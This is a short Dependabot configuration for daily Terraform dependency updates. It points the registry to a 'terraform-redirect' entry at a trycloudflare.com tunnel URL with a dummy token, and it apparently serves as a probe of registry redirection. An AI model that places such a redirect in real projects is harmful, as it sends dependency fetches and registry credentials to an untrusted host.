version: 2
updates:
  - package-ecosystem: "terraform"
    directory: "/"
    schedule:
      interval: "daily"
    registries:
      - terraform-redirect
registries:
  terraform-redirect:
    type: terraform-registry
    url: "https://cocktail-functioning-myers-convertible.trycloudflare.com"
    token: "dummy-token-for-auth"
